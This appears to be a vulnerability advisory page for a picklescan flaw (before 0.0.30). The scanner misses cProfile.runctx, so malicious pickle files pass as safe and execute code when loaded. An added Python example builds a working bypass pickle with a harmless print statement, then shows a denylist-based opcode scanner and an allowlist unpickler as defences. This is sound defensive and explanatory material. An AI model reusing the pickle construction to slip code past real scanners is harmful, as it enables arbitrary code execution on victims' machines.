VYPR
Unrated severity · NVD Advisory · Published Jun 21, 2026

picklescan - Remote Code Execution via Undetected cProfile.runctx in Pickle Files

CVE-2025-71378

Description

picklescan before 0.0.30 fails to detect cProfile.runctx function calls in pickle file reduce methods, allowing attackers to execute arbitrary code. Malicious pickle files bypass picklescan detection and execute remote code when loaded via pickle.load().

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Affected products: 1

Patches

Vulnerability mechanics

Root cause

"Missing detection of cProfile.runctx in the list of dangerous pickle reduce functions."

Attack vector

An attacker crafts a malicious pickle file whose `__reduce__` method returns `cProfile.runctx` as the callable, with an arbitrary Python statement string as its first argument. `cProfile.runctx(statement, globals, locals)` simply passes that statement to `exec()` under the profiler, so when a victim calls `pickle.load()` on the file after `picklescan` has reported it as safe, the embedded statement runs with the victim's privileges, achieving remote code execution [ref_id=1].

Affected code

The `picklescan` library before version 0.0.30 fails to detect `cProfile.runctx` function calls inside pickle file `__reduce__` methods, allowing malicious pickle files to bypass the scanner's safety checks.

What the fix does

The patch adds `cProfile.runctx` to the list of dangerous globals that `picklescan` flags when they appear as the callable of a pickle `__reduce__` result. Without this entry the scanner reported the file as safe even though `pickle.load()` would execute arbitrary code through the standard-library `cProfile.runctx` call.
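The attack vector and the fix above can be seen end to end in the following added example. It is not picklescan's own code and not part of the original advisory: it builds a pickle whose `__reduce__` hands `cProfile.runctx` a Python statement, walks the pickle opcodes with `pickletools` (never unpickling) to list the globals the file references, and checks them against two illustrative denylists, one without a `cProfile` entry (the pre-0.0.30 situation) and one with `cProfile.runctx` added (what the fix does). The denylist tables, the `scan` function and the `AllowlistUnpickler` are this example's own stand-ins and assumptions, not picklescan's real tables or API; the embedded statement is a constructed, harmless `print`.

```python
"""Added example for this advisory (not picklescan's own code).

Builds a pickle whose __reduce__ hands cProfile.runctx an arbitrary Python
statement, then runs a simplified opcode-level denylist scanner over the bytes,
once with a denylist that lacks cProfile and once with cProfile.runctx added.
The denylists and the scanner are stand-ins, not picklescan's real code.
"""
import cProfile
import io
import pickle
import pickletools


class Payload:
    """Object whose pickled form reduces to cProfile.runctx(statement, {}, {})."""

    def __init__(self, statement: str) -> None:
        self.statement = statement

    def __reduce__(self):
        # cProfile.runctx(statement, globals, locals) exec()s the statement
        # under the profiler; the profiling is incidental, the exec() is the point.
        return (cProfile.runctx, (self.statement, {}, {}))


# Constructed, deliberately harmless statement; a real payload would import
# os or subprocess here instead.
STATEMENT = "print('statement executed during pickle.load')"


def build_malicious_pickle(protocol: int = pickle.HIGHEST_PROTOCOL) -> bytes:
    """Serialize the payload; protocol < 4 emits GLOBAL, protocol >= 4 STACK_GLOBAL."""
    return pickle.dumps(Payload(STATEMENT), protocol=protocol)


def referenced_globals(data: bytes) -> list[tuple[str, str]]:
    """(module, name) for every GLOBAL / STACK_GLOBAL opcode, without unpickling.

    STACK_GLOBAL takes module and name from the two most recently pushed
    strings; this walker tracks string constants only and ignores memo
    lookups (BINGET etc.), which is enough for the payload built above.
    """
    found: list[tuple[str, str]] = []
    strings: list[str] = []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name == "GLOBAL":
            module, name = arg.split(" ", 1)  # pickletools joins "module name"
            found.append((module, name))
        elif opcode.name == "STACK_GLOBAL":
            if len(strings) >= 2:
                found.append((strings[-2], strings[-1]))
        elif opcode.name in ("SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8",
                             "UNICODE", "STRING", "BINSTRING", "SHORT_BINSTRING"):
            strings.append(arg)
    return found


# Illustrative denylists (assumptions, not picklescan's actual tables);
# "*" means every name in that module is flagged.
DENYLIST_BEFORE = {
    "builtins": {"eval", "exec", "compile", "__import__"},
    "os": {"*"},
    "subprocess": {"*"},
}
DENYLIST_AFTER = {**DENYLIST_BEFORE, "cProfile": {"runctx"}}


def scan(data: bytes, denylist: dict[str, set[str]]) -> list[tuple[str, str]]:
    """Return the denylisted globals the pickle references; empty means 'reported safe'."""
    hits = []
    for module, name in referenced_globals(data):
        names = denylist.get(module, set())
        if "*" in names or name in names:
            hits.append((module, name))
    return hits


class AllowlistUnpickler(pickle.Unpickler):
    """Load-time defence that does not depend on a scanner denylist being complete."""

    ALLOWED = {("collections", "OrderedDict")}  # whatever the application really needs

    def find_class(self, module, name):
        if (module, name) not in self.ALLOWED:
            raise pickle.UnpicklingError(f"refusing global {module}.{name}")
        return super().find_class(module, name)


def allowlist_rejects(data: bytes) -> bool:
    """True if the allowlist unpickler refuses the pickle before any code runs."""
    try:
        AllowlistUnpickler(io.BytesIO(data)).load()
    except pickle.UnpicklingError:
        return True
    return False


if __name__ == "__main__":
    data = build_malicious_pickle()
    print("globals referenced:", referenced_globals(data))
    print("pre-fix denylist hits:", scan(data, DENYLIST_BEFORE))  # [] -> reported safe
    print("post-fix denylist hits:", scan(data, DENYLIST_AFTER))  # [('cProfile', 'runctx')]
    print("allowlist unpickler rejects it:", allowlist_rejects(data))
    pickle.loads(data)  # the harmless statement above runs here, proving the point
```

The scanner inspects opcodes only and never calls `pickle.load()`, which is the only safe way to examine an untrusted pickle. The two denylists make the advisory's point concrete: a denylist can only flag names it knows about, so any callable that reaches `exec()` and is missing from the table, as `cProfile.runctx` was before 0.0.30, sails through. `AllowlistUnpickler` is the complementary control for code that must load pickles from outside: overriding `find_class` to accept an explicit allowlist rejects `cProfile.runctx` (and any other unexpected global) before `REDUCE` ever executes, regardless of what the scanner knows.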

Preconditions

  • Config: the victim uses picklescan < 0.0.30 to scan a pickle file before loading it
  • Input: the victim calls pickle.load() on the scanned file
  • Input: the attacker supplies a pickle file whose __reduce__ method returns cProfile.runctx with a Python statement string as its first argument

Generated on Jun 22, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References: 2

News mentions: 0 (no linked articles in our index yet)